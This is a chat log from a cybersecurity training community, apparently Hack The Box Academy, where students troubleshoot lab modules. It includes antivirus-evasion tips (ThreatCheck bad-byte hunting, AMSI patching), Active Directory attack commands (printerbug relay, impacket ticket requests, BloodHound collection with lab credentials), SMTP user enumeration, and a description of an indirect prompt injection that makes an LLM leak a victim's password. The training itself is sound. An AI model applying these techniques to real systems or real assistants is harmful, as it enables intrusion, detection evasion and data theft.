But I’ll just download 2.7 and see what’s gonna happen

lean folio
#

Guys can somebody help me? Doing xss skill assessment, and got this...
everything did correctly, step by step...
(I will answer later, cause have to go to sleep rn. TYSM in advance šŸ™‚ )

fast quest
#

Hey, I doing windows evasion module in that static analysis, dynamic, etc we need to compile the c# code in release mode and x64 architecture but when use the threatcheck tool to scan the threats shows no threats found in the exe but if we do the same for the .dll file it shows the threats.

while googling got a method to publish the program into a single file as app.exe and then ran the same threatcheck tool on the app.exe now it shows the threats present in the exe. i have question over here to solve the challenges we need to first compile it into a single exe then bypass all the threats to get the flag?

just want to ensure that my understanding is correct or not? because in the material nothing like this is mentioned

Its working do try it and keep this in mind

⁨`Main part is compilation, when we compile the program it should be Release build -> architecture (x86,x64) . After successful build the file stored in .exe .dll .pdg etc but the payload stays in the .dll file so if we are using Threatcheck tool to check use it on the .dll file.

Another way is storing the executable in a single file for this we need to follow few steps.

Build the program -> Solution explorer -> Right click -> Publish -> Target (Folder) -> Specific Target (Folder) -> Publish location -> Configuration (Release & architecture) -> Deployment mode (Self-contained) -> Target Runtime (win-x64) -> File publish options (Produce single file)

now the project executable stores as .exe and .pdg and if we use the ThreatCheck tool on the exe it will shows whether it has bad bytes or No threat.`⁩

fathom pendant
vital zodiac
#

I've an issue in "Server-Side JavaScript Injection", whenever I want to put the flag it shows me that it is incorrect.

digital coral
#

Can anyone help me with 'Credential Hunting in Network Shares' in Password Attacks? I'm a little bit stuck

cyan veldt
fathom pendant
cyan veldt
#

still with --break-system-packages i cant run the tool

fathom pendant
fathom pendant
fathom pendant
#

Sounds like you're missing a requirement then :)

cyan veldt
fathom pendant
#

python2.7 -m install packagename

cyan veldt
fathom pendant
#

Sorry mistyped

#

Its -m pip install

#

Then replace packagename with what you're installing

cyan veldt
#

python2.7 -m pip install packagename?

#

ok

#

no pip module it says

fathom pendant
#

?

cyan veldt
fathom pendant
cyan veldt
fathom pendant
#

Otherwise it thinks you're trying to install a package literally named requirements.txt

cyan veldt
fathom pendant
#

Ah ok

#

That's a different error than im thinking

cyan veldt
#

so

fathom pendant
#

Google is your friend

#

Learn how to look up and resolve errors

cyan veldt
#

alr thx

fathom pendant
#

All I've been doing is googling what you're giving me

fathom pendant
#

@karmic frigate module is above tier 0, please refrain from sharing screenshots from it

karmic frigate
#

Ok but its not something big i just shared a screenshot of a picture of burp from the module to compare expected output and the problem

fathom pendant
#

Its still considered content from the module

leaden island
#

yo guys

#

im on the module 'Attacking Applications Connecting to Services'
im trying to set a breakpoint to reveal the SQL connection credentials

#

but im getting ```Cannot insert breakpoint 1.
Cannot access memory at address 0x11b0

#

which is the function call for the connection, and the credentials' address must be stored at some register at this stage, if im not mistaken

karmic frigate
#

im doing this module Server-side Attacks / Exploiting SSRF
so it supposed to give me a dashboard with the admin password but still giving me the answer for Identifying ssrf in past section
because both have the same directory but different outputs for each section
i have reset the target machine multiple times and still the same so no idea why

potent linden
#

Hi, I have a quick Q in regards to DACL Attacks II > SPN Jacking - I've been able to capture the last flag, but not via WinRM - is WinRM the intended method / should you be able to grab the flag this way?

brazen marlin
#

try breaking at the function name

#

if not, break at the address using *0x11b0 in your case

cyan vortex
#

Is anyone able to clarify what I may be doing wrong on the "Bypassing Security Filters" for the "Web Attacks" module? ....nevermind sorted it out and am humbled..

granite sandal
#

Hi, im doing the Password Attacks module, on the pass the ticket (linux) section. Ive made it all the way to the root user but cannot get to reading julio.txt. Ive found the second krb5||cc_64...HRJDux file||, exported it, and then ran ||smbclient //dc01//julio -k -c ls --no-pass|| Still no luck. Any hints for moving forward?

granite sandal
#

this is a compleeeeeeeete longshot but any chance you remember wht you did to fix it? i am getting the same error

gray yacht
granite sandal
brittle kestrel
#

What's the content of the flag located at C:\Users\Arturo\Desktop\flag.txt windows lateral movement skill assessment

#

any nudge ? , (ps: i have access as arturo tho)

cloud urchin
#

Make sure you're on the right machine

brittle kestrel
#

same protocol ?

#

cuz i found a lot of non standerized ports tho on that same machine

#

i got access using one of them

#

but the desktop is empty

soft moon
#

is it me or this module with the binary and web thick client exploit buggy as hell?
https://academy.hackthebox.com/module/113/section/2164

i was working on this yesterday and the new.jar file worked but now today when creating the new.jar file doesnt even want to open up

soft moon
#

ive changed the beans.xml and manifest.mf files while removing the hash files (RSA and SF)
but not sure if i am doing something wrong although following the instructions got me somewhere yesterday

brittle kestrel
cloud urchin
#

yeah

mystic fjord
#

hello, can i get any help with the skill assessment of the api attacks module? i just have a few questions

hexed oyster
#

OK, I'm very confused (and possibly very frustrated). I'm working on "Exploiting Web Vulnerabilities in Thick-Client Applications". I'm at the point where I'm modifying the binary to download another binary. I've modified the code as per the walk-through and now I have to generate new class files.... My question is "why?" Why am I not just creating an entirely new binary like I did before and go from there?

#

I generate class files, I over write the old one with the new ones, rebuild again... why am I going through all that work?

hexed oyster
bleak moat
#

Good evening everyone, currently in my Junior Cybersecurity analyst path and am doing the skills assessment under Network Foundation - Chapter 3 - I keep receiving an ā€œinverse host lookup failedā€ when I input the following command nc -v <Target IP > <dynamic port> which the last two numbers when I enter passive mode is 194 & 16 - am I entering something wrong here? Any insight would be helpful

hexed oyster
#

@soft moon you still around?

fathom pendant
hexed oyster
fathom pendant
#

i don't recall when it was added, but it very much was a big wtf moment from practically everyone

#

and you're seeing the improved version of that section

hexed oyster
#

I'm sorry, my brain was not prepared for that last part.

#

No joke, it's causing problems with my learning disability.

#

It's very frustrating.

#

I'll muscle through it but it's... tough.

fathom pendant
#

most people weren't prepared for it because you're basically reverse engineering a java application with very little rhyme or reason as to the back and forth

hexed oyster
#

Really glad I'm not the only one. That makes me feel a lot better.

fathom pendant
#

and Java Sucksā„¢

hexed oyster
#

OH MY GOD RIGHT?!

#

why?! why are we still doing this to ourselves?!

fathom pendant
#

because it's on 6 billion machines /s

hexed oyster
#

oh...

#

that's so many...

fathom pendant
#

(it's a joke, have you seen the java splash screen?)

hexed oyster
#

thankfully not in YEARS

fathom pendant
hexed oyster
#

Why?

#

I was doing so good.

fathom pendant
#

Because you have been given the curse of Ra for decompiling and recompiling Java (against your will)

hexed oyster
#

Ok, you joke, but I'm about šŸ¤ this close to believing you.

soft moon
#

between this section and the binary my progress has crawled painful desk head banging

hexed oyster
soft moon
#

sure go for it

#

i now got the new.jar file to work but now it doesnt want to connect

#

the next day curse is true

civic fiber
#

Did you solved it yet?

leaden island
civic fiber
#

For Attacking WPA/WPA2 Wi-Fi Networks
Page 13
Attacking EAP-TLS Authentication:

  • I cannot find the file nagaw.py in remote machine.
autumn pilot
#

it's in the /opt directory

civic fiber
thin hearth
#

Hi, I learned about module password attacks. I have troubleshot I do not understand the methodology to create a wordlist for cracking. Can someone refer me to some docs or websites to learn some methodology for this ?

hollow acorn
#

i rise

civic inlet
# leaden island still in need of help here

hello!

not quite sure what command you are running in the debugger but this error might be due to you trying to break on the PLT address instead of the function name.

You can send me a DM if you still need help

jovial walrus
#

Do we have asrep roast in attacking AD module?

pseudo kiln
#

Currently working on XPath - Blind Exploitation script building. The author mentions "Note: Writing a small script for this task is recommended." I do not get where the "small" part is, I am already at 100 lines of code in python and I still need to add more. Am I missing something?

tiny cave
#

anyone having issues with Connect to the HTB-Corp WiFi network using the obtained credentials. What is the value of the flag at 192.168.1.1?

Section 11: Enterprise Evil-Twin Attack

I already gotten the first 2 question correct but could not authenticate to the WiFi ... even with wpa_supplicant

gray yacht
brazen marlin
frosty ferry
#

can't seeem to find the answer for this one can someone tell me what is the correct answer i have tried everything

#

it's this module

smoky snow
#

Hi! on OWE Transition Mode Evil Twin https://academy.hackthebox.com/module/304/section/3872
I did the exact commands shown in here (and even in the solution provided by gold annual, which are exactly the very same commands) but I only get EAPOL frames, but no POST requests, even when I restart the box, can someone guide me to it ?

acoustic oak
#

Did anyone ever get back to you on this? I'm haviing the same issue. I've tried on VPN, I've tried on pwnbox. I keep getting the Issue sending URL. I've tested the payload and it catches the credentials. I've tried to paste the URL directly into the address bar to try an bypass the form in the send page too incase that was an issue as well.

To be clear I've tried resetting the pwn box and triying VPN over again checking the payload, checking my php file in the temp server. I've even rage quit a couple of times and come back hours later and even the next day to see if this was an issue with any of the servers maybe, and at this point I don't know what else I could be missing.

Thank you for your time and help with this!

rancid eagle
#

Good evening, I'm working on Introduction to Linux Forensics and I'm stuck with 1 question. I have found all possible answers but none of them are working. Can anybody help me? It would be better to find someone who has already done that.

timid anchor
#

Hey guys , I am new here need some help with Login Brute Forcing skill assessment 2 , i was able to find the username for ftp but stuck in the password can someone help

autumn pilot
autumn pilot
#

I just tested the exercise and letting it capture the traffic for 2-4 minutes I was able to see the HTTP traffic inside wireshark

#

On which VPN server are you doing the exercise?

smoky snow
#

EU Academy 5

rancid eagle
#

I found the answer but that was kinda absurb

smoky snow
#

no problem on any other exercices, just this one

autumn pilot
#

Let me test the exercise on eu-5

#

In the meantime if you would like to test it in parallel you can try on us-academy-4, on which it worked.

smoky snow
#

sure, let me try

#

@autumn pilot yes it worked (slowly because US is far from my location) on US-4

autumn pilot
#

yeah, that's the downside of it

#

from what I can see on the EU region it might be due to the overload at the moment

smoky snow
#

damn, a lot of issues with the EU vpns lately ...

#

thanks for the support

autumn pilot
#

no worries

leaden island
#

hope we get a middle east server in the future

gritty light
#

AD Trust Atks Using Bloodhound-CE

For some reason enum from user in parent domain -> child domain, bloodhound-ce-breaks. I have my /etc/hosts and krb5.conf. I did both with and without extra dot. Yes WS01 is the DC (great naming...). I assume I'm doing something wrong but rusthound-ce did this no problem

rusthound-ce -u htb-student@inlanefreight.ad -p 'HTB_@cademy_stdnt!' -i 172.16.118.20  -f WS01.child.inlanefreight.ad  --domain child.inlanefreight.ad  -c All --zip
ā”Œā”€ā”€(p1erce㉿ATKBOX)-[~/CAPE/Trust-Attacks]
└─$ bloodhound-ce-python -u htb-student@inlanefreight.ad  -p 'HTB_@cademy_stdnt!' -d child.inlanefreight.ad. -ns 172.16.118.20 --zip -c All --dns-tcp  -dc WS01.child.inlanefreight.ad  -v
INFO: BloodHound.py for BloodHound Community Edition
DEBUG: Authentication: username/password
DEBUG: Resolved collection methods: rdp, session, acl, trusts, group, container, objectprops, psremote, localadmin, dcom
DEBUG: Using DNS to retrieve domain information
DEBUG: Querying domain controller information from DNS
DEBUG: Using domain hint: child.inlanefreight.ad.
INFO: Found AD domain: child.inlanefreight.ad
DEBUG: Found primary DC: WS01.child.inlanefreight.ad
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
DEBUG: Found KDC for enumeration domain: WS01.child.inlanefreight.ad
DEBUG: Found KDC for user: DC01.inlanefreight.ad
DEBUG: Using supplied domain controller as KDC
INFO: Getting TGT for user
DEBUG: Trying to connect to KDC at DC01.inlanefreight.ad:88
DEBUG: Following referral across trust to get next TGT
DEBUG: Trying to connect to KDC at CHILD.INLANEFREIGHT.AD:88
DEBUG: Following referral across trust to get next TGT
DEBUG: Trying to connect to KDC at CHILD.INLANEFREIGHT.AD:88
DEBUG: Following referral across trust to get next TGT
DEBUG: Trying to connect to KDC at CHILD.INLANEFREIGHT.AD:88
gritty light
#

AD Trust Atks Using Bloodhound-CE (Workaround)

I checked what rusthound was doing, turns out forcing ntlm made this work, so I think it's something weird with DNS + Kerberos (as usual). Of course this won't work in labs where NTLM is disabled, but a temp-fix for now.

ā”Œā”€ā”€(p1erce㉿ATKBOX)-[~/CAPE/Trust-Attacks]
└─$ bloodhound-ce-python -u htb-student@inlanefreight.ad  -p 'HTB_@cademy_stdnt!' -d logistics.ad. -ns 172.16.118.252    --auth-method ntlm --zip -c All --dns-tcp
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: logistics.ad
INFO: Connecting to LDAP server: DC02.logistics.ad
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: DC02.logistics.ad
INFO: Connecting to GC LDAP server: DC02.logistics.ad
glad notch
#

I’m on the windows evasion module, specifically on AMSI bypasses.

I have defender flag the second bypass on behaviour on my own windows box, kicking up a fuss for the fact I am patching AMSI. Is this just a thing now, patching AMSI bad?

red kernel
#

Is anyone available to provide a hint on imagebot in the LLM Output Attack Skill Assessment in the AI Red Teamer Path? I'm to the point where I'm performing an injection against a vulnerable function in imagebot. Tried a lot of different things so far but no luck.

uneven yarrow
#

Can anyone help with the LLM Output Attacks > Exfiltration Attacks 2 question, where my indirect prompt injection is failing to prompt LLM output with the victim's history. Even though I’ve successfully hosted the payload, the methodology only returns generic assistant text instead of exfiltrating the actual password from the victim.

heavy kraken
#

Hi! I'm currently working through the "Attacking Common Applications" module from the CPTS path and got kinda confused in the "Attacking CGI Applications - Shellshock" section. How comes that we inject the payload into the User Agent string? This came a little random for me. Also I didn't really understand when the payload is executed. In the subsection "Shellshock via CGI" it says "The function does nothing but returns an exit code 0, but when it is imported, it will execute the command ...". When or where is the function imported?

brittle kestrel
#

@cloud urchin can i dm about the windows lateral movement skill assessment ?

#

it's about the wsus abuse using ||rossy||

fathom pendant
brittle kestrel
#

is it normal to get an error like this !!! ? šŸ‘€

#

btw am using powershell with domain joined user tho

heavy kraken
fathom pendant
#

Its just a flaw in how the user-agent was being processed. You're not likely to run into Shellshock in a modern system

heavy kraken
#

Yes that’s correct but does not really answer my question šŸ˜… the question is how exactly is it processed to trigger the vulnerability

fathom pendant
#

In a web application, for instance, it might check for ../ in a regex, and replace it, but only does it once

#

Or replace things in uploaded files

#

I.e. a. Php file you upload may have the <,> characters replaced

#

Or insert a # at the start of the line

stray remnant
#

any1 available to give me a hand exfiltrating a file in the PDF injection lab of Injection Attacks?

lean kindle
#

Hey guys, what's up?
Someone can help me in Password Attack module? i'm currently in "pass the certificate", trying get the Administrator acessar by "AD CS NTLM Relay Attack (ESC8)"

Well, i tried what the htb say about that, but the printerbug returns error to me
check it out

ā”Œā”€ā”€(kali㉿kali)-[~/HTB/krbrelayx]
└─$ python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.234.174 10.10.14.124
INFO: Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

INFO: Attempting to trigger authentication via rprn RPC at 10.129.234.174
INFO: Bind OK
INFO: Got handle
The NETBIOS connection with the remote host timed out.
INFO: Triggered RPC backconnect, this may or may not have worked
CRITICAL: An unhandled exception has occured. Trying next host:
CRITICAL: Error occurs while reading from remote(104)
#

well.. after that, i tried scan using Certipy and found that HTTP is not enable in the machine

──(Certipy)─(kali㉿kali)-[~/HTB/Certipy]
└─$ cat 20260203173356_Certipy.txt
Certificate Authorities
  0
    CA Name                             : inlanefreight-CA01-CA
    DNS Name                            : CA01.inlanefreight.local
    Certificate Subject                 : CN=inlanefreight-CA01-CA, DC=inlanefreight, DC=local
    Certificate Serial Number           : 75ADD4AAC656AE874ABB2F4016102CF1
    Certificate Validity Start          : 2025-04-28 17:01:06+00:00
    Certificate Validity End            : 2035-04-28 17:11:05+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
    Active Policy                       : Unknown
    Disabled Extensions                 : Unknown
Certificate Templates                   : [!] Could not find any certificate templates
                                                                                      

so... what i do wrong?

#

this is suppose to be not vulnerable by ESC8, right?

brittle kestrel
#

anyone here for the skill assessment of (windows lateral movement)

#

wsus is not wsusing anymore xD

slow cliff
#

Hello all -- I am just cleaning up some missed cubes and went back to the 'Getting Started' module to do the 'public exploits' section. I was able to enumerate, find the exploit, find a public exploit to throw at it and successfully got the flag but during this I was also trying to figure out developing and understanding the exploit for myself. I understand that there is a vulnerable module which downloads the target file but I am lost on how to actually find the filepath in the first place. The exploit I found just iterated through ../, ../../, etc. until it found the file but that only works if the file is somewhere in the modules current folder hierarchy. Additionally, what would have been my command line alternative to trigger the file download of the vulnerable module; the exploit used a python requests.get but when I put in the same URL in a curl request I get nothing back (although maybe I am not iterating enough parent folders?). Any advice appreciated. I am trying my best to never use MSF

gritty light
#

Trust Account Kerberos vs NTLM?
Can any anyone explain why I need a TGT for the trust account for this?

ā”Œā”€ā”€(p1erce㉿ATKBOX)-[~/HTB/CAPE/Trust-Attacks]
└─$ pcq impacket-getTGT 'megacorp.ad/logistics$' -hashes :<SNIP>
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in logistics$.ccache

ā”Œā”€ā”€(p1erce㉿ATKBOX)-[~/HTB/CAPE/Trust-Attacks]
└─$ pcq nxc smb megacorp.ad -u 'logistics$' -H <SNIP>
SMB         224.0.0.1       445    DC03             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC03) (domain:MEGACORP.AD) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         224.0.0.1       445    DC03             [-] MEGACORP.AD\logistics$:<SNIP> STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT
ā”Œā”€ā”€(p1erce㉿ATKBOX)-[~/HTB/CAPE/Trust-Attacks]
└─$ pcq nxc smb megacorp.ad -u 'logistics$' --use-kcache
SMB         megacorp.ad     445    DC03             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC03) (domain:MEGACORP.AD) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         megacorp.ad     445    DC03             [+] MEGACORP.AD\logistics$ from ccache
potent delta
#

Hello, I'm having trouble with the SQL Injection Fundamentals Skills Assessment part. I've tried looking up some tutorials of it, but they seem to be outdated as they are not using the same login page to exploit. If anyone can point me in the right direction I would appreciate it.

scenic parcel
vale narwhal
safe star
unborn summit
#

has anyone had problems in the bloodhound module - analyzing bloodhound data where in community edition it shows 0 sessions?

timid anchor
mystic fjord
#

Any help with the API Attacks skill assessment? Can i DM someone?

pseudo kiln
#

long shot type of question,but has anyone around here used HTB Academy to prepare for CREST certifications?

lethal kayak
#

Hi guys. I'm trying to do the web archive excercise on the information gathering module but It's not working. I keep clicking on the specified date but it shows me another, is this part of the exercise or is it just my internet?

ivory kelp
#

module Information security foundation sub module Winfows security and the section is windows security (got the same name ) question is Find the SID of the bob.smith user. and my anwer is Ā S-1-5-21-2614195641-1726409526-3792725429-1003

#

now i have tried removing those "--" did not worked i remove the S

#

did not worked

lean kindle
autumn pilot
#

Which module and section are you working on?

autumn pilot
#

I can't find a module called Information Security Foundation

ivory kelp
autumn pilot
#

That is the name of the path

ivory kelp
#

name of the module

autumn pilot
#

A path is a collection of modules

ivory kelp
#

sorry it is a path my bad

warped hare
#

hello, please in File Inclusion - Remote File Inclusion (RFI) (/module/23/section/254)
the target spawn without a port and I am unable to reach it.

autumn pilot
#

You need to download your VPN profile and use it to connect to the VPN so you can reach the target

#

Also, try using curl or nmap to verify if the web application is running (on port 80 presumably)

young sentinel
#

So I did this in /etc/hosts : 10.129.27.170 app.inlanefreight.local
10.129.27.170 dev.inlanefreight.local
using curl with this curl -I http://app.inlanefreight.local
curl: (7) Failed to connect to app.inlanefreight.local port 80 after 3219 ms: Could not connect to server
curl -I http://dev.inlanefreight.local
curl: (7) Failed to connect to dev.inlanefreight.local port 80 after 3251 ms: Could not connect to server
wafw00f http://app.inlanefreight.local got this back: RROR:wafw00f:Something went wrong HTTPConnectionPool(host='app.inlanefreight.local', port=80): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f8cd5d80590>: Failed to establish a new connection: [Errno 113] No route to host'))
ERROR:wafw00f:Site app.inlanefreight.local appears to be down
then this: wafw00f http://dev.inlanefreight.local got this: ERROR:wafw00f:Something went wrong HTTPConnectionPool(host='dev.inlanefreight.local', port=80): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff39fcd0590>: Failed to establish a new connection: [Errno 113] No route to host'))
ERROR:wafw00f:Site dev.inlanefreight.local appears to be down

went to this: nikto -h http://app.inlanefreight.local

  • Nikto v2.5.0


  • 0 host(s) tested
    Same came out for dev. What did I do wrong. I followed the steps, but it still didn't work. Can some one please point this old dog to the kibble bowl of 'why'?
orchid gust
undone coral
orchid gust
warped hare
#

you can see the tun0 on my screenshot

#

ok, I downloaded new VPN file and now it works ok!

left frigate
#

Think this was an issue last week

#

seems to be happening again

jovial walrus
#

The windows priv esc module is only for stand alone machine or priv esc in AD as well?

left frigate
#

Do we know whether internal HTB team are working on the current issue?

marble quiver
eternal vigil
#

Hey everyone,
I was doing pivoting rpivot sub module, it was easy to get to the needed browser but i cant see any flag on homepage and tried to move to other pages to look for it but cant find it. The one on the homepage doesnt work, it just says || It works! || but istg it doesnt.

marble quiver
eternal vigil
marble quiver
#

Sounds correct. The flag should be in the red box where it normally says "It works!"

eternal vigil
#

its saying just that

#

but there is no flag

marble quiver
#

can you send me the commands you used so far in dms?

mighty dirge
#

Hi everyone,
I was doing the Skill Assessment for the module "INTRO TO ASSEMBLY LANGUAGE", For the first task. I am able to decode the shellcode and trying to run it using jmp rsp instruction but running into segmentation fault.

I have tried to clear the register rax,rbx,rcx. But the error still remained.

cyan veldt
viral lotus
#

Hi, I am running through the XSS module, I am currently on the phishing task. I have managed to get it to call back to my php server when I post into index.php. but when I go to put the URL into send it wont take it? any help appreciated (I get the issue sending URL error)

gray yacht
#

Did you get this sorted out?

solid forge
#

Stuck on File Upload skill assesment:
Try to exploit the upload form to read the flag found at the root directory "/".
I found the upload dir via ||XXE injection||
and found the allowed content type and extentions
but still coulndnt upload a backdoor

jaunty comet
scenic parcel
scenic parcel
shut wraith
#

Hello. This is the exact command from the module. But it does not work ....

jade moon
#

Hi! I'm trying to pass the skill assessment task in the AI Privacy Module. The instancehits an immediate timeout right after submitting the model. Is it related to Docker issues or anything else? I’d appreciate any help, can't do anything with it the whole day

primal pasture
#

Hi, I’m having issues with the Windows Privilege Escalation – Windows Server module. The RDP connection using rdesktop keeps dropping, and smb_delivery constantly crashes the Meterpreter sessions. Is anyone else experiencing this or has found a solution?

cloud urchin
coarse pine
#

is there a problem with the machines?

marble quiver
#

Should be slowly working again for everyone tho

coarse pine
#

but what happened?

#

I remember I did a machine yesterday

#

they asked me the password of ftp so I was brute forcing

#

maybe I done something wrong

potent delta
#

Hello, I'm having trouble with the SQL Injection Fundamentals Skills Assessment part. I've tried looking up some tutorials of it, but they seem to be outdated as they are not using the same login page to exploit. If anyone can point me in the right direction I would appreciate it.

vagrant pine
#

Hi I’m in the AD enumeration and attacks module and the chapter ā€œInitial enumeration@ asks us to xfreerdp to the Linux attack box they’ve set up. I’m not able to connect to that box. See screenshots.

coarse pine
#

you should clean your laptop first

lean folio
lean folio
vagrant pine
#

Thanks. I think I'm good for now. Turns out the other commands in that section don't require gui access, so its enough if I ssh into the box.

hazy grotto
#

@fathom pendant I see HTB is having docker target issues? I'm able to spin up a lab but can't ping it. However i get filtered ports on a nmap scan? Are these issues related?

fathom pendant
#

not staff, don't know

hazy grotto
coarse pine
#

like

#

i was brute forcing something yesterday

#

i don't know if i did something wrong

#

sorry

vast cairn
#

hey guys, I"m trying to work through Kernel Exploits in the Windows Privilege Escalation module. I get down to the section where I'm supposed to replace the maintenanceservice.exe binary with a malicious binary, but it won't copy because access is denied. I cannot open cmd in admin mode.

#

it appears to be an inability to access the destination folder, because I can copy the file to Desktop, but it won't go from Desktop to the destination

#

I also cannot do it with the powershell Copy-Item

vast cairn
#

ok. So I guess my issue there was that I used ⁨.\⁩ to run the CVE exe. Now I've gotten past that, but now I"m trying to get the meterpreter session and it's not working...

#

looking at the msfvenom command I used to generate the exe, it's the correct payload, ip, port... same IP and port that the metasploit is expecting to get.

stone plover
#

can I get a nudge on Advanced XSS and CSRF Exploitation - XSS Filter Bypasses
I'm past the filter but my payload errors out with CORS error.

got it. not a fan of a module that teaches you something but not that it might silently fail or how it's different than the other payloads in a pretty major way

deft ibex
#

CDSA : Guys who know about Windows Event Logs & Finding EVIL path Analyzing Evil With Sysmon & Event Logs module's labs , I did well like content but in eventvwr.exe there are not any id 7 ? What I must do in this case , after all labs action not appearing 7 id šŸ™

leaden island
#

U need to switch vpn for us, because they usually have the least load

#

If it dosent work either, i try after some hours and it works

fast quest
#

Hey, Can anyone help me with the rundll32 from windows evasion module bit stuck followed the entire procedure in the module but not getting the reverse shell?

wary ivy
#

Request: Help on an HTB academy objective assessment.

So essentially I’ve gone through the ā€œnetwork foundationsā€ module and am on the O.A for it at the end. I’ve taken a significant amount of notes on it however, I have no experience using the parrot OS or any OS for that matter. I’m having a hard time understanding the information put in front of me in the OS window. Are there any resources that break down in detail how to read the data in this table and what’s actually important?

#

I can’t attach images but essentially my issue is that idk what I’m looking at in the parrot terminal it all seems like randomized data. Yes I can identify IP’s but that’s where my knowledge of the information ends. Any advice/resources would be greatly appreciated.

hasty mauve
#

Module: Introduction to Windows Evasion Techniques
Section: Process Injection
Question: Write a program that spawns calc.exe and then uses PE injection to grant a reverse shell. Place it in "C:\Alpha\ProcessInjection" and wait up to a minute until a user runs the program. Your goal is to read the contents of flag.txt on the desktop of the user who will execute your program.

I followed everything and literally copy-pasted the code (using micr0_shell payload as stated) and it keeps giving me the thread timeout error in log.txt file.
It says checking for calc.exe..... then thread timeout or something like that.
Tried to even write my own version in C++, also did not work.
Can anyone please help?

jade moon
cyan veldt
#

Still need help? DM me

gray saddle
#

Module: Using CrackMapExec
Section: Searching for Accounts in Group Policy Objects
Question: What's the name of the other account present in the GPO?

Executing the -M gpp-password module has been showing timeout for two days now.
Can anyone please help?

autumn pilot
#

Try adding the --dns-timeout 30 and --dns-tcp flags

autumn pilot
#

Take a look at the PowerShell bit version used in the code and based on that use the specific dll

gray saddle
autumn pilot
#

With a little adjustment of the timeouts it ran successfully

brisk drift
#

Hey guys, i would need some help for the DNS section in the Footprinting module, it's for the last question : What is the FQDN of the host where the last octet ends with "x.x.x.203"? but i don't find any host in 203 and as far as i tried, reverse dns didn't worked..
Does someone can help me ?

autumn pilot
#

Use the diagram in the section to build an idea of what you need to enumerate next

lusty terrace
#

In Command Injection - Identify Filters question Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application? I'm pretty sure my answer is correct but it keeps saying incorrect answer. The answer is in the question itself new-line, &, |

#

even using the actual OPERATOR name

brisk drift
lusty terrace
#

is not the correct answer

gray saddle
fathom pendant
lusty terrace
fathom pendant
brisk drift
fathom pendant
brisk drift
#

yeah yeah, i've already the sub1, but if i have to search any sub2 on all the sub1 it will be long

fathom pendant
#

step 1: dig axfr inlanefreight.htb @ip
step 2: use that as your base list for checking

brisk drift
#

yeah yeah it's what i'm doing

fathom pendant
#

module is above tier 0; please don't share command output

brisk drift
#

ok mb

#

hmmmmm

fathom pendant
#

also as a general strategy for finding the right wordlist: start small go big

lusty terrace
fathom pendant
#

šŸ˜‰

lusty terrace
fathom pendant
#

Cyberchef is taking the literal string of \n

#

so it's treating it as 2 characters, not a single control

lusty terrace
#

ohhh I see

#

thank you very much

fathom pendant
#

see: other injection operators section, in the table there "header injection"

brisk drift
#

It just failed ..

fathom pendant
fathom pendant
brisk drift
#

I'm trying with the basic domain, just to understand how it works first, and it failed, i'm trying an other wordlist rn

fathom pendant
brisk drift
#

okok mb, i missed a letter at the end, i'll try again

fathom pendant
brisk drift
#

fck

#

but now it's really really long x)

fathom pendant
#

patience is a key thing to have in this field

brisk drift
#

I'm patient but it start to be really really long x)

#

Ok after a long way, i'm under the sunset šŸ™‚

misty reef
#

I need to say this: the Environment Enumeration lab in the Linux PrivEsc module is incredibly frustrating and poorly designed.

The section provides zero clues on how to actually find the flag using the methodology taught. None of the commands explained (OS/Kernel version, PATH, etc.) lead you to the solution in a logical way. It feels absurd that the only way to find it is by 'guessing' the flag format and grepping the whole system, or finding an exploit that isn't even mentioned in the text or discoverable via sudo -l (since it requires a password).

It’s a poor design for a learning module because it forces you to look for spoilers instead of practicing the enumeration steps you just read. The real exploit exists, but it shouldn't be the focus of an 'Enumeration' section if the text doesn't teach you how to find it first. Has anyone actually solved this using ONLY the methodology provided in the text?

fast quest
#

@autumn pilot can i dm you for the rundll32 windows evasion module?

coarse bane
#

Can I DM someone to get a hint for the Skills Assessment - File Inclusion?

brisk drift
#

Hey guys, in the SMTP course in the FootPrinting Module, can someone juste tell me if i'm the good way cause i'm trying to use wordlists but it's very very long on the HTB's machine, and i don't have the commande on my personal terminal. And, the command isn't even present in the course cause footprinting is a really small part in this course so i don't know if i'm on the good way.
For information, i started my first "small" wordlist at 31... that why i don't want to try 10 wordlists if it's more than 10m each

#

Thx

#

Spoil of my command, don't look it if you're starting the course ( event if it's possible that it's not the good commande at all šŸ™‚ ) ||smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t 10.129.26.6||

misty reef
fathom pendant
brisk drift
#

Yeah i saw it, but i didn't find it

fathom pendant
#

Also dont use rcpt

#

VRFY is better

brisk drift
#

just, how could i find the wordlist, i have the name, it is in the hint

brisk drift
#

No it's ok i download it

#

May someone now how to install smtp-enum-user ?

#

Cause it's toooo loonggg on the HTB machine

misty reef
brisk drift
#

Output : 0 result

#

With the wordlist download in the button ressources

fathom pendant
misty reef
brisk drift
#

options are :
-t n Wait a maximum of n seconds for reply (default: 5)

#

I don't understand cause -t is suppose to be an arg for an ip ?

#

it srsly doesn't work

#

it's horrible ..

misty reef
# brisk drift it's horrible ..

Are you sure you're still connected to the VPN? Since you switched from the Pwnbox to your own machine, you need the OpenVPN connection active to reach the target

brisk drift
#

Yeah i pinged

misty reef
brisk drift
#

smtp-user-enum -M VRFY -U TƩlƩchargements/footprinting-wordlist.txt -w 30 -t 10.129.26.18

#

Now i'm on the HTB's Machine, just run that

#

it will take a while

#

cause on my machine i've that :

misty reef
#

Remember that some SMTP servers have higher response times

#

